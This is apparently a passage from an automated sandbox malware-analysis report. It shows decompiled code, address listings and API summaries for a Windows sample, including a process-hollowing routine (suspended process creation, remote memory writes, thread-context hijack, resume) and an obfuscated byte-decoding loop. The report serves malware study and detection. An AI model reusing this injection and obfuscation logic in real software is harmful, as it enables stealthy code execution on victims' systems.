                                                                                                                                                                                            					if(_v788 == 0x714c) {
                                                                                                                                                                                            						_v212 = _v364 <<  *_v344;
                                                                                                                                                                                            						_v240 = _v240 | 0x0000a1f9;
                                                                                                                                                                                            						_v212 = _v364 -  *_v344;
                                                                                                                                                                                            						_t2022 = _v36;
                                                                                                                                                                                            						_push(_t2022);
                                                                                                                                                                                            						L00406036();
                                                                                                                                                                                            						_v420 = _t2022;
                                                                                                                                                                                            						 *_v44 = ( *_v44 & 0x000000ff) + (_v357 & 0x000000ff);
                                                                                                                                                                                            						E004035B0( *_v44, _v240);
                                                                                                                                                                                            					}
                                                                                                                                                                                            					L122:
                                                                                                                                                                                            					_push( *_v476 & 0x0000ffff);
                                                                                                                                                                                            					_push( *_v44 & 0x000000ff);
                                                                                                                                                                                            					E00405F90( *_v76 & 0x000000ff);
                                                                                                                                                                                            					goto L123;
                                                                                                                                                                                            				}
                                                                                                                                                                                            			}
                                                                                                                                                                                            0x00403735
                                                                                                                                                                                            0x0040374f
                                                                                                                                                                                            0x0040375d
                                                                                                                                                                                            0x00405f63
                                                                                                                                                                                            0x00405f73
                                                                                                                                                                                            0x00405f84
                                                                                                                                                                                            0x00405f84
                                                                                                                                                                                            0x0040376b
                                                                                                                                                                                            0x00403771
                                                                                                                                                                                            0x00403781
                                                                                                                                                                                            0x0040378a
                                                                                                                                                                                            0x0040379a
                                                                                                                                                                                            0x004037b7
                                                                                                                                                                                            0x004037d1
                                                                                                                                                                                            0x004037f2
                                                                                                                                                                                            0x004037f7
                                                                                                                                                                                            0x004037f7
                                                                                                                                                                                            0x00403800
                                                                                                                                                                                            0x0040380e
                                                                                                                                                                                            0x00403814
                                                                                                                                                                                            0x00403821
                                                                                                                                                                                            0x00403839
                                                                                                                                                                                            0x00403840
                                                                                                                                                                                            0x0040384f
                                                                                                                                                                                            0x0040385b
                                                                                                                                                                                            0x0040386f
                                                                                                                                                                                            0x00405e9a
                                                                                                                                                                                            0x00405eac
                                                                                                                                                                                            0x00405ebc
                                                                                                                                                                                            0x00405ecd
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405ecd
                                                                                                                                                                                            0x0040387d
                                                                                                                                                                                            0x00403889
                                                                                                                                                                                            0x00403892
                                                                                                                                                                                            0x0040389e
                                                                                                                                                                                            0x004038b1
                                                                                                                                                                                            0x004038bd
                                                                                                                                                                                            0x004038cd
                                                                                                                                                                                            0x0040397e
                                                                                                                                                                                            0x004038d3
                                                                                                                                                                                            0x004038dd
                                                                                                                                                                                            0x004038ea
                                                                                                                                                                                            0x004038f3
                                                                                                                                                                                            0x00403900
                                                                                                                                                                                            0x0040390d
                                                                                                                                                                                            0x00403920
                                                                                                                                                                                            0x0040393c
                                                                                                                                                                                            0x00403902
                                                                                                                                                                                            0x00403909
                                                                                                                                                                                            0x0040394d
                                                                                                                                                                                            0x00403961
                                                                                                                                                                                            0x00403961
                                                                                                                                                                                            0x00403909
                                                                                                                                                                                            0x00403967
                                                                                                                                                                                            0x004038dd
                                                                                                                                                                                            0x00403987
                                                                                                                                                                                            0x00403994
                                                                                                                                                                                            0x0040399d
                                                                                                                                                                                            0x004039ae
                                                                                                                                                                                            0x004039b8
                                                                                                                                                                                            0x004039bf
                                                                                                                                                                                            0x004039dd
                                                                                                                                                                                            0x004039e8
                                                                                                                                                                                            0x004039ff
                                                                                                                                                                                            0x00403a0c
                                                                                                                                                                                            0x00403a22
                                                                                                                                                                                            0x00403a2b
                                                                                                                                                                                            0x00403a43
                                                                                                                                                                                            0x00403a53
                                                                                                                                                                                            0x00403a66
                                                                                                                                                                                            0x00403a7b
                                                                                                                                                                                            0x00403a91
                                                                                                                                                                                            0x00403aa0
                                                                                                                                                                                            0x00403aba
                                                                                                                                                                                            0x00403acc
                                                                                                                                                                                            0x00403acc
                                                                                                                                                                                            0x00403add
                                                                                                                                                                                            0x00403af3
                                                                                                                                                                                            0x00403af6
                                                                                                                                                                                            0x00403b17
                                                                                                                                                                                            0x00403b20
                                                                                                                                                                                            0x00403b29
                                                                                                                                                                                            0x00403b3b
                                                                                                                                                                                            0x00403b42
                                                                                                                                                                                            0x00403b51
                                                                                                                                                                                            0x00403b62
                                                                                                                                                                                            0x00403b76
                                                                                                                                                                                            0x00403b8d
                                                                                                                                                                                            0x00403ba2
                                                                                                                                                                                            0x00403bbb
                                                                                                                                                                                            0x00403bcd
                                                                                                                                                                                            0x00403bda
                                                                                                                                                                                            0x00403bef
                                                                                                                                                                                            0x00403c04
                                                                                                                                                                                            0x00403c20
                                                                                                                                                                                            0x00403c2f
                                                                                                                                                                                            0x00403c45
                                                                                                                                                                                            0x00403c54
                                                                                                                                                                                            0x00403c6c
                                                                                                                                                                                            0x00403c7a
                                                                                                                                                                                            0x00403c8e
                                                                                                                                                                                            0x00403ca0
                                                                                                                                                                                            0x00403cb4
                                                                                                                                                                                            0x00403ccf
                                                                                                                                                                                            0x00403ce5
                                                                                                                                                                                            0x00403cf7
                                                                                                                                                                                            0x00403d08
                                                                                                                                                                                            0x00403d19
                                                                                                                                                                                            0x00403d2c
                                                                                                                                                                                            0x00403d42
                                                                                                                                                                                            0x00403d54
                                                                                                                                                                                            0x00403d69
                                                                                                                                                                                            0x00403d7b
                                                                                                                                                                                            0x00403d8b
                                                                                                                                                                                            0x00403d9a
                                                                                                                                                                                            0x00403daf
                                                                                                                                                                                            0x00403dc2
                                                                                                                                                                                            0x00403dd6
                                                                                                                                                                                            0x00403de9
                                                                                                                                                                                            0x00403dfa
                                                                                                                                                                                            0x00403e0d
                                                                                                                                                                                            0x00403e1f
                                                                                                                                                                                            0x00403e37
                                                                                                                                                                                            0x00403e49
                                                                                                                                                                                            0x00403e5d
                                                                                                                                                                                            0x00403e6e
                                                                                                                                                                                            0x00403e82
                                                                                                                                                                                            0x00403e96
                                                                                                                                                                                            0x00403eab
                                                                                                                                                                                            0x00403ebe
                                                                                                                                                                                            0x00403ed3
                                                                                                                                                                                            0x00403eec
                                                                                                                                                                                            0x00403efa
                                                                                                                                                                                            0x00403f0b
                                                                                                                                                                                            0x00403f11
                                                                                                                                                                                            0x00403f26
                                                                                                                                                                                            0x00403f2c
                                                                                                                                                                                            0x00403f46
                                                                                                                                                                                            0x00405e5a
                                                                                                                                                                                            0x00405e70
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404ab2
                                                                                                                                                                                            0x00404ab2
                                                                                                                                                                                            0x00404abe
                                                                                                                                                                                            0x00404ad2
                                                                                                                                                                                            0x00404ae1
                                                                                                                                                                                            0x00404af4
                                                                                                                                                                                            0x00404b08
                                                                                                                                                                                            0x00404b21
                                                                                                                                                                                            0x00404b35
                                                                                                                                                                                            0x00404b4a
                                                                                                                                                                                            0x00404b59
                                                                                                                                                                                            0x00404b67
                                                                                                                                                                                            0x00404b78
                                                                                                                                                                                            0x00404b8b
                                                                                                                                                                                            0x00404b9e
                                                                                                                                                                                            0x00404bab
                                                                                                                                                                                            0x00404bb7
                                                                                                                                                                                            0x00404bbf
                                                                                                                                                                                            0x00404bcb
                                                                                                                                                                                            0x00404be5
                                                                                                                                                                                            0x00404be9
                                                                                                                                                                                            0x00404c17
                                                                                                                                                                                            0x00404c27
                                                                                                                                                                                            0x00404c3d
                                                                                                                                                                                            0x00404c4e
                                                                                                                                                                                            0x00404c64
                                                                                                                                                                                            0x00404c64
                                                                                                                                                                                            0x00404c6e
                                                                                                                                                                                            0x00404c85
                                                                                                                                                                                            0x00404c8a
                                                                                                                                                                                            0x00404c9a
                                                                                                                                                                                            0x00404caa
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404c9c
                                                                                                                                                                                            0x00404cba
                                                                                                                                                                                            0x00404cd2
                                                                                                                                                                                            0x00404cdc
                                                                                                                                                                                            0x00404cec
                                                                                                                                                                                            0x00405d4b
                                                                                                                                                                                            0x00405d61
                                                                                                                                                                                            0x00405d6d
                                                                                                                                                                                            0x00404cf2
                                                                                                                                                                                            0x00404cfc
                                                                                                                                                                                            0x00404d08
                                                                                                                                                                                            0x00404d15
                                                                                                                                                                                            0x00404d6f
                                                                                                                                                                                            0x00404d84
                                                                                                                                                                                            0x00404d9c
                                                                                                                                                                                            0x00404dab
                                                                                                                                                                                            0x00404dc1
                                                                                                                                                                                            0x00404d17
                                                                                                                                                                                            0x00404d1e
                                                                                                                                                                                            0x00404d31
                                                                                                                                                                                            0x00404d41
                                                                                                                                                                                            0x00404d55
                                                                                                                                                                                            0x00404d62
                                                                                                                                                                                            0x00404d62
                                                                                                                                                                                            0x00404d1e
                                                                                                                                                                                            0x00404dcd
                                                                                                                                                                                            0x00404de0
                                                                                                                                                                                            0x00404ded
                                                                                                                                                                                            0x00404e04
                                                                                                                                                                                            0x00404e0d
                                                                                                                                                                                            0x00404e21
                                                                                                                                                                                            0x00404e27
                                                                                                                                                                                            0x00404e2d
                                                                                                                                                                                            0x00404e39
                                                                                                                                                                                            0x00404e46
                                                                                                                                                                                            0x00404f03
                                                                                                                                                                                            0x00404f04
                                                                                                                                                                                            0x00404f09
                                                                                                                                                                                            0x00404f25
                                                                                                                                                                                            0x00404f27
                                                                                                                                                                                            0x00404e4c
                                                                                                                                                                                            0x00404e53
                                                                                                                                                                                            0x00404e68
                                                                                                                                                                                            0x00404e86
                                                                                                                                                                                            0x00404e9b
                                                                                                                                                                                            0x00404eb1
                                                                                                                                                                                            0x00404ec7
                                                                                                                                                                                            0x00404edb
                                                                                                                                                                                            0x00404eea
                                                                                                                                                                                            0x00404efb
                                                                                                                                                                                            0x00404efb
                                                                                                                                                                                            0x00404e53
                                                                                                                                                                                            0x00404f2f
                                                                                                                                                                                            0x00404f45
                                                                                                                                                                                            0x00404f53
                                                                                                                                                                                            0x00404f60
                                                                                                                                                                                            0x00404f74
                                                                                                                                                                                            0x00404f89
                                                                                                                                                                                            0x00404f92
                                                                                                                                                                                            0x00404fa5
                                                                                                                                                                                            0x00404fbe
                                                                                                                                                                                            0x00404fc9
                                                                                                                                                                                            0x00404fcf
                                                                                                                                                                                            0x00404fdb
                                                                                                                                                                                            0x00404fed
                                                                                                                                                                                            0x00404fff
                                                                                                                                                                                            0x00405011
                                                                                                                                                                                            0x00405021
                                                                                                                                                                                            0x00405027
                                                                                                                                                                                            0x00405033
                                                                                                                                                                                            0x0040504e
                                                                                                                                                                                            0x00405078
                                                                                                                                                                                            0x00405ce3
                                                                                                                                                                                            0x00405cf0
                                                                                                                                                                                            0x00405cf0
                                                                                                                                                                                            0x00405cf6
                                                                                                                                                                                            0x00405d08
                                                                                                                                                                                            0x00405d24
                                                                                                                                                                                            0x00405d34
                                                                                                                                                                                            0x00405d72
                                                                                                                                                                                            0x00405d7e
                                                                                                                                                                                            0x00405d92
                                                                                                                                                                                            0x00405d94
                                                                                                                                                                                            0x00405d9d
                                                                                                                                                                                            0x00405d9e
                                                                                                                                                                                            0x00405da3
                                                                                                                                                                                            0x00405dba
                                                                                                                                                                                            0x00405dd2
                                                                                                                                                                                            0x00405dd7
                                                                                                                                                                                            0x00405dd7
                                                                                                                                                                                            0x00405de2
                                                                                                                                                                                            0x00405dfa
                                                                                                                                                                                            0x00405e12
                                                                                                                                                                                            0x00405e1d
                                                                                                                                                                                            0x00405e24
                                                                                                                                                                                            0x00405e2d
                                                                                                                                                                                            0x00405e32
                                                                                                                                                                                            0x00405e44
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405e44
                                                                                                                                                                                            0x00405b18
                                                                                                                                                                                            0x00405b1d
                                                                                                                                                                                            0x00405b2e
                                                                                                                                                                                            0x00405b37
                                                                                                                                                                                            0x00405b51
                                                                                                                                                                                            0x00405b5d
                                                                                                                                                                                            0x00405b67
                                                                                                                                                                                            0x00405b7d
                                                                                                                                                                                            0x00405b87
                                                                                                                                                                                            0x00405b91
                                                                                                                                                                                            0x00405ba2
                                                                                                                                                                                            0x00405baa
                                                                                                                                                                                            0x00405bbd
                                                                                                                                                                                            0x00405bbd
                                                                                                                                                                                            0x00405be7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405be7
                                                                                                                                                                                            0x0040551f
                                                                                                                                                                                            0x004052e7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004052e7
                                                                                                                                                                                            0x00405283
                                                                                                                                                                                            0x00404cfe
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404cec
                                                                                                                                                                                            0x00404c9a
                                                                                                                                                                                            0x0040379c
                                                                                                                                                                                            0x004037a6
                                                                                                                                                                                            0x00405ee5
                                                                                                                                                                                            0x00405ef6
                                                                                                                                                                                            0x00405f0a
                                                                                                                                                                                            0x00405f10
                                                                                                                                                                                            0x00405f13
                                                                                                                                                                                            0x00405f14
                                                                                                                                                                                            0x00405f19
                                                                                                                                                                                            0x00405f31
                                                                                                                                                                                            0x00405f3e
                                                                                                                                                                                            0x00405f3e
                                                                                                                                                                                            0x00405f43
                                                                                                                                                                                            0x00405f4c
                                                                                                                                                                                            0x00405f53
                                                                                                                                                                                            0x00405f5b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405f60

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00403883
                                                                                                                                                                                            • FindFirstPrinterChangeNotification.WINSPOOL.DRV(?,00000022,00000065,?), ref: 00403FDC
                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0040451E
                                                                                                                                                                                            • WritePrinter.WINSPOOL.DRV(?,?,000000F5,?), ref: 004049D7
                                                                                                                                                                                            • GetProcessHeap.KERNEL32 ref: 00404CB4
                                                                                                                                                                                            • FindClosePrinterChangeNotification.WINSPOOL.DRV(?), ref: 00405D9E
                                                                                                                                                                                              • Part of subcall function 004035E0: FindNextPrinterChangeNotification.WINSPOOL.DRV(?,?,?,?), ref: 004035FC
                                                                                                                                                                                              • Part of subcall function 00405F90: FindFirstPrinterChangeNotification.WINSPOOL.DRV(?,000000C0,00000097,?,?), ref: 00405FA8
                                                                                                                                                                                            • AreFileApisANSI.KERNEL32 ref: 00403A25
                                                                                                                                                                                              • Part of subcall function 004034C0: FindNextPrinterChangeNotification.WINSPOOL.DRV(?,?,?,?), ref: 004034D6
                                                                                                                                                                                              • Part of subcall function 00403570: FindFirstPrinterChangeNotification.WINSPOOL.DRV(?,000000E9,0000009D,?,?,?,0040350F,?), ref: 00403588
                                                                                                                                                                                            • FindClosePrinterChangeNotification.WINSPOOL.DRV(?), ref: 00405F14
                                                                                                                                                                                              • Part of subcall function 004035B0: ScheduleJob.WINSPOOL.DRV(?,00000068), ref: 004035C2
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ChangeFindNotification.Printer$First$CloseNext$ApisFileFrequencyHeapJob.PerformancePrinter.ProcessQueryScheduleVersionWrite
                                                                                                                                                                                            • String ID: #.$/$A$D$Lq$QY\UPMBHwXRVj\Xlb\aNYnG$SY$Yl77GRFLUv\yB2EF3$de7z0WJA4\fa\yMszmIm$ds$e$i$q
                                                                                                                                                                                            • API String ID: 1791108859-2410147766
                                                                                                                                                                                            • Opcode ID: 8ae20cb46d96bfebb3c0093b768494abcc4d4a57b6eb1f4b5a4cfc2ea8f0b501
                                                                                                                                                                                            • Instruction ID: e46eb3543c0c0c9d4329bdc2546ba549d4d265b0c05a4df7bad6228f03e22152
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ae20cb46d96bfebb3c0093b768494abcc4d4a57b6eb1f4b5a4cfc2ea8f0b501
                                                                                                                                                                                            • Instruction Fuzzy Hash: F853E234A04668CFCB65CF69C890BEDBBB2BF8A301F1481DAD949A7355D6346E84CF14
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 360 414189-414199 361 41477b 360->361 362 41419f-4141a3 360->362 364 41477d-414783 361->364 362->361 363 4141a9-41436b call 414154 * 2 362->363 369 41436d-41438d call 41405f 363->369 369->361 372 414393-414397 369->372 372->369 373 414399 372->373 374 41439b-4143f9 373->374 378 414411-414413 374->378 379 4143fb-414401 374->379 381 414416-414426 378->381 379->378 380 414403-414407 379->380 380->378 382 414409-41440f 380->382 381->361 383 41442c-414438 381->383 382->381 383->361 384 41443e-41444c 383->384 384->361 385 414452-41446f CreateProcessW 384->385 386 414475-414484 GetThreadContext 385->386 387 41473a 385->387 386->387 389 41448a-4144a8 ReadProcessMemory 386->389 388 41473c-414740 387->388 390 414752-414756 388->390 391 414742-41474c 388->391 389->387 392 4144ae-4144b4 389->392 395 414758 390->395 396 41475e-414760 390->396 391->390 393 4144c5-4144dc VirtualAlloc 392->393 394 4144b6-4144bf 392->394 393->387 399 4144e2-4144fa VirtualAllocEx 393->399 394->387 394->393 395->396 397 414762-414768 396->397 398 41476c-414775 396->398 397->398 398->361 398->374 402 41453d-414552 399->402 403 4144fc-4144fe 399->403 408 414582-414591 402->408 409 414554-41455a 402->409 404 414500-414516 403->404 405 414518-41452b 403->405 406 41452c-414537 404->406 405->406 406->387 406->402 412 414597-41459b 408->412 413 414618-41462a WriteProcessMemory 408->413 411 41455c-41457e 409->411 422 414580 411->422 412->413 415 41459d-4145ae 412->415 413->388 416 414630-414647 VirtualProtectEx 413->416 415->413 418 4145b0-4145be 415->418 416->388 419 41464d-414656 416->419 423 414601-414616 418->423 424 4145c0-4145c8 418->424 420 4146c7-4146d3 VirtualFree 419->420 421 414658-41465e 419->421 420->388 428 4146d5-4146ee WriteProcessMemory 420->428 425 414660-414667 421->425 422->408 
423->413 423->418 426 4145ca-4145eb 424->426 427 4145ee-4145ff 424->427 429 414682-414684 425->429 430 414669-41466b 425->430 426->427 427->423 427->424 428->388 431 4146f0-41470e SetThreadContext 428->431 434 414686 429->434 435 41468b-414696 429->435 432 414671-414680 430->432 433 41466d-41466f 430->433 431->388 436 414710-41471b ResumeThread 431->436 439 414697-4146b1 VirtualProtectEx 432->439 438 414688-414689 433->438 434->438 435->439 436->388 437 41471d-414721 436->437 440 414723 437->440 441 414729-41472d 437->441 438->439 442 4146b3-4146c3 439->442 443 4146c5 439->443 440->441 444 414735-414738 441->444 445 41472f 441->445 442->425 442->443 443->420 444->364 445->444
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041446A
                                                                                                                                                                                            • GetThreadContext.KERNELBASE(?,00010007), ref: 0041447F
                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004144A0
                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 004144D2
                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004144F2
                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 00414625
                                                                                                                                                                                            • VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 00414642
                                                                                                                                                                                            • VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 004146AC
                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004146CE
                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004146E9
                                                                                                                                                                                            • SetThreadContext.KERNELBASE(?,00010007), ref: 00414706
                                                                                                                                                                                            • ResumeThread.KERNELBASE(?), ref: 00414713
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                            • API String ID: 12256240-2746444292
                                                                                                                                                                                            • Opcode ID: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
                                                                                                                                                                                            • Instruction ID: 7d82b52b3abfa3a090bde65039563ff4697b03c5c3b4b168d9b3f0e6416f9571
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
                                                                                                                                                                                            • Instruction Fuzzy Hash: A8122971E002199BDF21CFA4CD84BEEBBB5FF44704F1484AAE519E6290E7789A85CF14
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph: function 403180 (legend: Executed / Not Executed)
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00403180() {
                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                            				char _v22;
                                                                                                                                                                                            				char _v23;
                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                            				char _v25;
                                                                                                                                                                                            				char _v26;
                                                                                                                                                                                            				char _v27;
                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                            				char _v29;
                                                                                                                                                                                            				char _v30;
                                                                                                                                                                                            				char _v31;
                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                            				char _v33;
                                                                                                                                                                                            				char _v34;
                                                                                                                                                                                            				char _v35;
                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                            				char _v37;
                                                                                                                                                                                            				char _v38;
                                                                                                                                                                                            				char _v39;
                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                            				char _v41;
                                                                                                                                                                                            				char _v42;
                                                                                                                                                                                            				char _v43;
                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                            				char _v45;
                                                                                                                                                                                            				char _v46;
                                                                                                                                                                                            				char _v47;
                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                            				char _v49;
                                                                                                                                                                                            				char _v50;
                                                                                                                                                                                            				char _v51;
                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                            				char _v53;
                                                                                                                                                                                            				char _v54;
                                                                                                                                                                                            				char _v55;
                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                            				char _v57;
                                                                                                                                                                                            				char _v58;
                                                                                                                                                                                            				char _v59;
                                                                                                                                                                                            				char _v60;
                                                                                                                                                                                            				char _v61;
                                                                                                                                                                                            				char _v62;
                                                                                                                                                                                            				char _v63;
                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                            				char _v65;
                                                                                                                                                                                            				char _v66;
                                                                                                                                                                                            				char _v67;
                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                            				char _v69;
                                                                                                                                                                                            				char _v70;
                                                                                                                                                                                            				char _v71;
                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                            				char _v73;
                                                                                                                                                                                            				char _v74;
                                                                                                                                                                                            				char _v75;
                                                                                                                                                                                            				char _v76;
                                                                                                                                                                                            				char _v77;
                                                                                                                                                                                            				char _v78;
                                                                                                                                                                                            				char _v79;
                                                                                                                                                                                            				char _v80;
                                                                                                                                                                                            				int _v104;
                                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                                            				signed int _v109;
                                                                                                                                                                                            				intOrPtr _v116;
                                                                                                                                                                                            				intOrPtr _v120;
                                                                                                                                                                                            				intOrPtr _v124;
                                                                                                                                                                                            				intOrPtr _v128;
                                                                                                                                                                                            				intOrPtr _v132;
                                                                                                                                                                                            				intOrPtr _v140;
                                                                                                                                                                                            				intOrPtr _v144;
                                                                                                                                                                                            				intOrPtr _v148;
                                                                                                                                                                                            				int _t129;
                                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                                            				void* _t134;
                                                                                                                                                                                            				void* _t137;
                                                                                                                                                                                            				char _t167;
                                                                                                                                                                                            				void* _t180;
                                                                                                                                                                                            
                                                                                                                                                                                            				_t129 = FreeConsole(); // executed
                                                                                                                                                                                            				_v80 = 0x9a;
                                                                                                                                                                                            				_v79 = 0x99;
                                                                                                                                                                                            				_v78 = 0x35;
                                                                                                                                                                                            				_v77 = 0x15;
                                                                                                                                                                                            				_v76 = 0x95;
                                                                                                                                                                                            				_v75 = 0xf4;
                                                                                                                                                                                            				_v74 = 0xf4;
                                                                                                                                                                                            				_v73 = 0x94;
                                                                                                                                                                                            				_v72 = 0x11;
                                                                                                                                                                                            				_v71 = 0xb3;
                                                                                                                                                                                            				_v70 = 0xd1;
                                                                                                                                                                                            				_v69 = 0x14;
                                                                                                                                                                                            				_v68 = 0xf3;
                                                                                                                                                                                            				_v67 = 0x77;
                                                                                                                                                                                            				_v66 = 0x13;
                                                                                                                                                                                            				_v65 = 0x6f;
                                                                                                                                                                                            				_v64 = 0xb6;
                                                                                                                                                                                            				_v63 = 0xb5;
                                                                                                                                                                                            				_v62 = 0xd6;
                                                                                                                                                                                            				_v61 = 0x75;
                                                                                                                                                                                            				_v60 = 0xac;
                                                                                                                                                                                            				_v59 = 0xcf;
                                                                                                                                                                                            				_v58 = 0xf2;
                                                                                                                                                                                            				_v57 = 0xce;
                                                                                                                                                                                            				_v56 = 0x55;
                                                                                                                                                                                            				_v55 = 0x4f;
                                                                                                                                                                                            				_v54 = 0x32;
                                                                                                                                                                                            				_v53 = 0x12;
                                                                                                                                                                                            				_v52 = 0xb5;
                                                                                                                                                                                            				_v51 = 0xc;
                                                                                                                                                                                            				_v50 = 0xa;
                                                                                                                                                                                            				_v49 = 0xac;
                                                                                                                                                                                            				_v48 = 0x5a;
                                                                                                                                                                                            				_v47 = 0xa8;
                                                                                                                                                                                            				_v46 = 0x48;
                                                                                                                                                                                            				_v45 = 0xc7;
                                                                                                                                                                                            				_v44 = 0x19;
                                                                                                                                                                                            				_v43 = 0xd2;
                                                                                                                                                                                            				_v42 = 0xa7;
                                                                                                                                                                                            				_v41 = 0xc5;
                                                                                                                                                                                            				_v40 = 0x6d;
                                                                                                                                                                                            				_v39 = 0x17;
                                                                                                                                                                                            				_v38 = 0xb2;
                                                                                                                                                                                            				_v37 = 0x56;
                                                                                                                                                                                            				_v36 = 0xd;
                                                                                                                                                                                            				_v35 = 0x4d;
                                                                                                                                                                                            				_v34 = 0x4d;
                                                                                                                                                                                            				_v33 = 0x32;
                                                                                                                                                                                            				_v32 = 0xce;
                                                                                                                                                                                            				_v31 = 0x43;
                                                                                                                                                                                            				_v30 = 0x23;
                                                                                                                                                                                            				_v29 = 0x5a;
                                                                                                                                                                                            				_v28 = 0x27;
                                                                                                                                                                                            				_v27 = 0xa9;
                                                                                                                                                                                            				_v26 = 0xee;
                                                                                                                                                                                            				_v25 = 0xa4;
                                                                                                                                                                                            				_v24 = 0xf9;
                                                                                                                                                                                            				_v23 = 0xe6;
                                                                                                                                                                                            				_v22 = 0xaa;
                                                                                                                                                                                            				_v108 = 0;
                                                                                                                                                                                            				while(_v108 < 0x3b) {
                                                                                                                                                                                            					_v109 =  *((intOrPtr*)(_t180 + _v108 - 0x4c));
                                                                                                                                                                                            					_v109 = (_v109 & 0x000000ff) >> 0x00000005 | (_v109 & 0x000000ff) << 0x00000003;
                                                                                                                                                                                            					_v109 = (_v109 & 0x000000ff) - 0xca;
                                                                                                                                                                                            					_v109 =  !(_v109 & 0x000000ff);
                                                                                                                                                                                            					_v109 = (_v109 & 0x000000ff) - _v108;
                                                                                                                                                                                            					_v109 = _v109 & 0x000000ff ^ _v108;
                                                                                                                                                                                            					_v109 = (_v109 & 0x000000ff) - _v108;
                                                                                                                                                                                            					_v109 = _v109 & 0x000000ff ^ 0x000000f3;
                                                                                                                                                                                            					_v109 =  ~(_v109 & 0x000000ff);
                                                                                                                                                                                            					_v109 = _v109 & 0x000000ff ^ _v108;
                                                                                                                                                                                            					_v109 = (_v109 & 0x000000ff) + 0x4a;
                                                                                                                                                                                            					_v109 = _v109 & 0x000000ff ^ _v108;
